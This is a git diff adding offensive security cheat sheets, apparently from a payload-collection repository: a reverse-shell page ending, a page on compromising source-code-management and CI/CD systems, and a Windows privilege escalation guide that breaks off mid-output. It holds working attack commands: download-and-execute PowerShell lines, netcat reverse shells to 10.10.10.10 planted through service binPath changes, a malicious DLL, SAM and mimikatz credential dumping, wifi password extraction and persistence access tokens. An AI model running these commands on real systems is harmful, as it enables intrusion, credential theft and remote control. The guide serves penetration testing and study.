https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001 +``` + +Offline version of the ps1 available at --> https://github.com/antonioCoco/ConPtyShell/blob/master/Invoke-ConPtyShell.ps1 + +## References + +* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) +* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) +* [Spawning a TTY Shell](http://netsec.ws/?p=337) +* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell) diff --git a/docs/pentest/Source Code Management.md b/docs/pentest/Source Code Management.md new file mode 100644 index 0000000..6a450b0 --- /dev/null +++ b/docs/pentest/Source Code Management.md @@ -0,0 +1,133 @@ +# Source Code Management & CI/CD Compromise + +> + +## Summary + +* [Tools](#tools) +* [Enumerate repositories files and secrets](#enumerate-repositories-files-and-secrets) +* [Personal Access Token](#personal-access-token) +* [Gitlab CI/Github Actions](#gitlab-cigithub-actions) +* [References](#references) + + +## Tools + +* [synacktiv/nord-stream](https://github.com/synacktiv/nord-stream) - List the secrets stored inside CI/CD environments and extract them by deploying malicious pipelines +* [xforcered/SCMKit](https://github.com/xforcered/SCMKit) - Source Code Management Attack Toolkit + + +## Enumerate repositories files and secrets + +Using [SCMKit - Source Code Management Attack Toolkit](https://github.com/xforcered/SCMKit) + +* Discover repositories being used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local + SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local + ``` +* Search for repositories by repository name in a particular SCM system + ```ps1 + SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term" + SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term" + ``` +* Search for code containing a given keyword in a particular SCM system + ```ps1 + SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term" + SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term" + ``` +* Search for files in repositories containing a given keyword in the file name in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term" + SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term" + ``` +* List snippets owned by the current user in GitLab + ```ps1 + SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local + SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local + ``` +* List all GitLab runners available to the current user in GitLab + ```ps1 + SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local + SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local + ``` +* Get the assigned privileges to an access token being used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local + ``` +* Promote a normal user to an administrative role in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName + ``` +* Create/List/Delete an access token to be used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName + SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID + SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser + SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser + ``` +* Create/List an SSH key to be used in a particular SCM system + ```ps1 + SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key" + SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key" + SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://github.something.local + SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://github.something.local + SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID + SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID + ``` + +## Personal Access Token + +Create a PAT (Personal Access Token) as a persistence mechanism for the Gitlab instance. + +```ps1 +curl -k --request POST --header "PRIVATE-TOKEN: apiToken" --data "name=user-persistence-token" --data "expires_at=" --data "scopes[]=api" --data "scopes[]=read_repository" --data "scopes[]=write_repository" "https://gitlabHost/api/v4/users/UserIDNumber/personal_access_tokens" +``` + +## Gitlab CI/Github Actions + +* Gitlab-CI "Command Execution" example: `.gitlab-ci.yml` + ```yaml + stages: + - test + + test: + stage: test + script: + - | + whoami + parallel: + matrix: + - RUNNER: VM1 + - RUNNER: VM2 + - RUNNER: VM3 + tags: + - ${RUNNER} + ``` +* Github Action "Command Execution" example: `.github/workflows/example.yml` + ```yml + name: example + on: + workflow_dispatch: + push: + branches: [ main ] + pull_request: + branches: [ main ] + + jobs: + build: + runs-on: windows-2019 + + steps: + - name: Execute + run: | + whoami + ``` + +## References + +* [Controlling the Source: Abusing Source Code Management Systems - Brett Hawkins - August 9, 2022](https://securityintelligence.com/posts/abusing-source-code-management-systems/) +* [CI/CD SECRETS EXTRACTION, TIPS AND TRICKS - Hugo Vincent, ThĂŠo Louis-Tisserand - 01/03/2023](https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks.html) \ No newline at end of file diff --git a/docs/pentest/Windows - Privilege Escalation.md b/docs/pentest/Windows - Privilege Escalation.md new file mode 100644 index 0000000..365e3db --- /dev/null +++ b/docs/pentest/Windows - Privilege Escalation.md @@ -0,0 +1,1536 @@ +# Windows - Privilege Escalation + +## Summary + +* [Tools](#tools) +* [Windows Version and Configuration](#windows-version-and-configuration) +* [User Enumeration](#user-enumeration) +* [Network Enumeration](#network-enumeration) +* [Antivirus Enumeration](#antivirus-enumeration) +* [Default Writeable Folders](#default-writeable-folders) +* [EoP - Looting for passwords](#eop---looting-for-passwords) + * [SAM and SYSTEM files](#sam-and-system-files) + * [HiveNightmare](#hivenightmare) + * [LAPS Settings](#laps-settings) + * [Search for file contents](#search-for-file-contents) + * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) + * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords) + * [Passwords in unattend.xml](#passwords-in-unattendxml) + * [Wifi passwords](#wifi-passwords) + * [Sticky Notes passwords](#sticky-notes-passwords) + * [Passwords stored in services](#passwords-stored-in-services) + * [Passwords stored in Key Manager](#passwords-stored-in-key-manager) + * [Powershell History](#powershell-history) + * [Powershell Transcript](#powershell-transcript) + * [Password in Alternate Data Stream](#password-in-alternate-data-stream) +* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks) +* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) +* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) +* [EoP - Unquoted Service Paths](#eop---unquoted-service-paths) +* [EoP - $PATH Interception](#eop---path-interception) +* [EoP - Named Pipes](#eop---named-pipes) +* [EoP - Kernel Exploitation](#eop---kernel-exploitation) +* [EoP - Microsoft Windows Installer](#eop---microsoft-windows-installer) + * [AlwaysInstallElevated](#alwaysinstallelevated) + * [CustomActions](#customactions) +* [EoP - Insecure GUI apps](#eop---insecure-gui-apps) +* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers) +* [EoP - Printers](#eop---printers) + * [Universal Printer](#universal-printer) + * [Bring Your Own Vulnerability](#bring-your-own-vulnerability) +* [EoP - Runas](#eop---runas) +* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) +* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) +* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) +* [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges) + * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) + * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) + * [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) + * [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver)) + * [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw)) + * [PrintSpoofer (Printer Bug)](#PrintSpoofer-Printer-Bug))) +* [EoP - Privileged File Write](#eop---privileged-file-write) + * [DiagHub](#diaghub) + * [UsoDLLLoader](#usodllloader) + * [WerTrigger](#wertrigger) + * [WerMgr](#wermgr) +* [EoP - Privileged File Delete](#eop---privileged-file-delete) +* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) + * [MS08-067 (NetAPI)](#ms08-067-netapi) + * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) + * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003) + * [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012) + * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) + * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) + * [CVE-2019-1388](#cve-2019-1388) +* [EoP - $PATH Interception](#eop---path-interception) +* [References](#references) + +## Tools + +- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) + ```powershell + powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks + ``` +- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) +- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) + ```powershell + powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1 + ``` +- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) +- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) + ```powershell + ./windows-exploit-suggester.py --update + ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt + ``` +- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) +- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits) +- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) +- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt) + ```powershell + Seatbelt.exe -group=all -full + Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt" + Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"" + ``` +- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) +- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS) + ```powershell + powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt + ``` +- [winPEAS - Windows Privilege Escalation Awesome Script](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) +- [Windows Exploit Suggester - Next Generation (WES-NG)](https://github.com/bitsadmin/wesng) + ```powershell + # First obtain systeminfo + systeminfo + systeminfo > systeminfo.txt + # Then feed it to wesng + python3 wes.py --update-wes + python3 wes.py --update + python3 wes.py systeminfo.txt + ``` +- [PrivescCheck - Privilege Escalation Enumeration Script for Windows](https://github.com/itm4n/PrivescCheck) + ```powershell + C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" + C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended" + C:\Temp\>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Report PrivescCheck_%COMPUTERNAME% -Format TXT,CSV,HTML" + ``` + +## Windows Version and Configuration + +```powershell +systeminfo | findstr /B /C:"OS Name" /C:"OS Version" +``` + +Extract patchs and updates +```powershell +wmic qfe +``` + +Architecture + +```powershell +wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% +``` + +List all env variables + +```powershell +set +Get-ChildItem Env: | ft Key,Value +``` + +List all drives + +```powershell +wmic logicaldisk get caption || fsutil fsinfo drives +wmic logicaldisk get caption,description,providername +Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root +``` + +## User Enumeration + +Get current username + +```powershell +echo %USERNAME% || whoami +$env:username +``` + +List user privilege + +```powershell +whoami /priv +whoami /groups +``` + +List all users + +```powershell +net user +whoami /all +Get-LocalUser | ft Name,Enabled,LastLogon +Get-ChildItem C:\Users -Force | select Name +``` + +List logon requirements; useable for bruteforcing + +```powershell$env:usernadsc +net accounts +``` + +Get details about a user (i.e. administrator, admin, current user) + +```powershell +net user administrator +net user admin +net user %USERNAME% +``` + +List all local groups + +```powershell +net localgroup +Get-LocalGroup | ft Name +``` + +Get details about a group (i.e. administrators) + +```powershell +net localgroup administrators +Get-LocalGroupMember Administrators | ft Name, PrincipalSource +Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource +``` + +Get Domain Controllers + +```powershell +nltest /DCLIST:DomainName +nltest /DCNAME:DomainName +nltest /DSGETDC:DomainName +``` + +## Network Enumeration + +List all network interfaces, IP, and DNS. + +```powershell +ipconfig /all +Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address +Get-DnsClientServerAddress -AddressFamily IPv4 | ft +``` + +List current routing table + +```powershell +route print +Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex +``` + +List the ARP table + +```powershell +arp -A +Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State +``` + +List all current connections + +```powershell +netstat -ano +``` + +List all network shares + +```powershell +net share +powershell Find-DomainShare -ComputerDomain domain.local +``` + +SNMP Configuration + +```powershell +reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s +Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse +``` + +## Antivirus Enumeration + +Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName` + + +## Default Writeable Folders + +```powershell +C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys +C:\Windows\System32\spool\drivers\color +C:\Windows\System32\spool\printers +C:\Windows\System32\spool\servers +C:\Windows\tracing +C:\Windows\Temp +C:\Users\Public +C:\Windows\Tasks +C:\Windows\System32\tasks +C:\Windows\SysWOW64\tasks +C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system +C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system +C:\Windows\debug\wia +C:\Windows\registration\crmlog +C:\Windows\System32\com\dmp +C:\Windows\SysWOW64\com\dmp +C:\Windows\System32\fxstmp +C:\Windows\SysWOW64\fxstmp +``` + +## EoP - Looting for passwords + +### SAM and SYSTEM files + +The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM. + +```powershell +# Usually %SYSTEMROOT% = C:\Windows +%SYSTEMROOT%\repair\SAM +%SYSTEMROOT%\System32\config\RegBack\SAM +%SYSTEMROOT%\System32\config\SAM +%SYSTEMROOT%\repair\system +%SYSTEMROOT%\System32\config\SYSTEM +%SYSTEMROOT%\System32\config\RegBack\system +``` + +Generate a hash file for John using `pwdump` or `samdump2`. + +```powershell +pwdump SYSTEM SAM > /root/sam.txt +samdump2 SYSTEM SAM -o sam.txt +``` + +Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash. + + +### HiveNightmare + +> CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user + +Check for the vulnerability using `icacls` + +```powershell +C:\Windows\System32> icacls config\SAM +config\SAM BUILTIN\Administrators:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Users:(I)(RX) <-- this is wrong - regular users should not have read access! +``` + +Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it. + +```powershell +mimikatz> token::whoami /full + +# List shadow copies available +mimikatz> misc::shadowcopies + +# Extract account from SAM databases +mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM + +# Extract secrets from SECURITY +mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY +``` + +### LAPS Settings + +Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry. + +* LAPS Enabled: AdmPwdEnabled +* LAPS Admin Account Name: AdminAccountName +* LAPS Password Complexity: PasswordComplexity +* LAPS Password Length: PasswordLength +* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled + + +### Search for file contents + +```powershell +cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt +findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt +findstr /spin "password" *.* +``` + +Also search in remote places such as SMB Shares and SharePoint: + +* Search passwords in SharePoint: [nheiniger/SnaffPoint](https://github.com/nheiniger/SnaffPoint) (must be compiled first, for referencing issue see: https://github.com/nheiniger/SnaffPoint/pull/6) + +```powershell +# First, retrieve a token +## Method 1: using SnaffPoint binary +$token = (.\GetBearerToken.exe https://your.sharepoint.com) +## Method 2: using AADInternals +Install-Module AADInternals -Scope CurrentUser +Import-Module AADInternals +$token = (Get-AADIntAccessToken -ClientId "9bc3ab49-b65d-410a-85ad-de819febfddc" -Tenant "your.onmicrosoft.com" -Resource "https://your.sharepoint.com") + +# Second, search on Sharepoint +## Method 1: using search strings in ./presets dir +.\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token +## Method 2: using search string in command line +### -l uses FQL search, see: https://learn.microsoft.com/en-us/sharepoint/dev/general-development/fast-query-language-fql-syntax-reference +.\SnaffPoint.exe -u "https://your.sharepoint.com" -t $token -l -q "filename:.config" +``` + +* Search passwords in SMB Shares: [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler) + +### Search for a file with a certain filename + +```powershell +dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* +where /R C:\ user.txt +where /R C:\ *.ini +``` + +### Search the registry for key names and passwords + +```powershell +REG QUERY HKLM /F "password" /t REG_SZ /S /K +REG QUERY HKCU /F "password" /t REG_SZ /S /K + +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" +reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters +reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials +reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials +reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password + +reg query HKLM /f password /t REG_SZ /s +reg query HKCU /f password /t REG_SZ /s +``` + +### Passwords in unattend.xml + +Location of the unattend.xml files. + +```powershell +C:\unattend.xml +C:\Windows\Panther\Unattend.xml +C:\Windows\Panther\Unattend\Unattend.xml +C:\Windows\system32\sysprep.inf +C:\Windows\system32\sysprep\sysprep.xml +``` + +Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`. + +Example content + +```powershell + + + U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo== + true + Administrateur + + + + + + *SENSITIVE*DATA*DELETED* + administrators;users + Administrateur + + + +``` + +Unattend credentials are stored in base64 and can be decoded manually with base64. + +```powershell +$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d +SecretSecurePassword1234* +``` + +The Metasploit module `post/windows/gather/enum_unattend` looks for these files. + +### IIS Web config + +```powershell +Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue +``` + +```powershell +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config +C:\inetpub\wwwroot\web.config +``` + +### Other files + +```bat +%SYSTEMDRIVE%\pagefile.sys +%WINDIR%\debug\NetSetup.log +%WINDIR%\repair\sam +%WINDIR%\repair\system +%WINDIR%\repair\software, %WINDIR%\repair\security +%WINDIR%\iis6.log +%WINDIR%\system32\config\AppEvent.Evt +%WINDIR%\system32\config\SecEvent.Evt +%WINDIR%\system32\config\default.sav +%WINDIR%\system32\config\security.sav +%WINDIR%\system32\config\software.sav +%WINDIR%\system32\config\system.sav +%WINDIR%\system32\CCM\logs\*.log +%USERPROFILE%\ntuser.dat +%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat +%WINDIR%\System32\drivers\etc\hosts +C:\ProgramData\Configs\* +C:\Program Files\Windows PowerShell\* +dir c:*vnc.ini /s /b +dir c:*ultravnc.ini /s /b +``` + +### Wifi passwords + +Find AP SSID +```bat +netsh wlan show profile +``` + +Get Cleartext Pass +```bat +netsh wlan show profile key=clear +``` + +Oneliner method to extract wifi passwords from all the access point. + +```batch +cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on +``` + +### Sticky Notes passwords + +The sticky notes app stores it's content in a sqlite db located at `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` + +### Passwords stored in services + +Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher) + + +```powershell +https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 +Import-Module path\to\SessionGopher.ps1; +Invoke-SessionGopher -AllDomain -o +Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss +``` + + +### Passwords stored in Key Manager + +:warning: This software will display its output in a GUI + +```ps1 +rundll32 keymgr,KRShowKeyMgr +``` + +### Powershell History + +Disable Powershell history: `Set-PSReadlineOption -HistorySaveStyle SaveNothing`. + +```powershell +type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt +type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt +type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt +cat (Get-PSReadlineOption).HistorySavePath +cat (Get-PSReadlineOption).HistorySavePath | sls passw +``` + +### Powershell Transcript + +```xml +C:\Users\\Documents\PowerShell_transcript....txt +C:\Transcripts\\PowerShell_transcript....txt +``` + +### Password in Alternate Data Stream + +```ps1 +PS > Get-Item -path flag.txt -Stream * +PS > Get-Content -path flag.txt -Stream Flag +``` + +## EoP - Processes Enumeration and Tasks + +* What processes are running? + ```powershell + tasklist /v + net start + sc query + Get-Service + Get-Process + Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize + ``` + +* Which processes are running as "system" + ```powershell + tasklist /v /fi "username eq system" + ``` + +* Do you have powershell magic? + ```powershell + REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion + ``` + +* List installed programs + ```powershell + Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime + Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name + ``` + +* List services + ```powershell + net start + wmic service list brief + tasklist /SVC + ``` + +* Enumerate scheduled tasks + ```powershell + schtasks /query /fo LIST 2>nul | findstr TaskName + schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM + Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State + ``` + +* Startup tasks + ```powershell + wmic startup get caption,command + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce + dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" + dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" + ``` + +## EoP - Incorrect permissions in services + +> A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system. + +Often, services are pointing to writeable locations: +- Orphaned installs, not installed anymore but still exist in startup +- DLL Hijacking + ```powershell + # find missing DLL + - Find-PathDLLHijack PowerUp.ps1 + - Process Monitor : check for "Name Not Found" + + # compile a malicious dll + - For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll" + - For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll" + + # content of windows_dll.c + #include + BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { + if (dwReason == DLL_PROCESS_ATTACH) { + system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt"); + ExitProcess(0); + } + return TRUE; + } + ``` + +- PATH directories with weak permissions + ```powershell + $ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt + $ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" + + $ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt + FOR /F %i in (Servicenames.txt) DO echo %i + type Servicenames.txt + FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt + FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt + ``` + +Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions` + +Note to check file permissions you can use `cacls` and `icacls` +> icacls (Windows Vista +) +> cacls (Windows XP) + +You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output. + +### Example with Windows 10 - CVE-2019-1322 UsoSvc + +Prerequisite: Service account + +```powershell +PS C:\Windows\system32> sc.exe stop UsoSvc +PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe" +PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe" +PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe" +PS C:\Windows\system32> sc.exe qc usosvc +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: usosvc + TYPE : 20 WIN32_SHARE_PROCESS + START_TYPE : 2 AUTO_START (DELAYED) + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Update Orchestrator Service + DEPENDENCIES : rpcss + SERVICE_START_NAME : LocalSystem + +PS C:\Windows\system32> sc.exe start UsoSvc +``` + +### Example with Windows XP SP1 - upnphost + +```powershell +# NOTE: spaces are mandatory for this exploit to work ! +sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe" +sc config upnphost obj= ".\LocalSystem" password= "" +sc qc upnphost +sc config upnphost depend= "" +net start upnphost +``` + +If it fails because of a missing dependency, try the following commands. + +```powershell +sc config SSDPSRV start=auto +net start SSDPSRV +net stop upnphost +net start upnphost + +sc config upnphost depend="" +``` + +Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe) + +```powershell +$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula +RW SSDPSRV + SERVICE_ALL_ACCESS +RW upnphost + SERVICE_ALL_ACCESS + +$ accesschk.exe -ucqv upnphost +upnphost + RW NT AUTHORITY\SYSTEM + SERVICE_ALL_ACCESS + RW 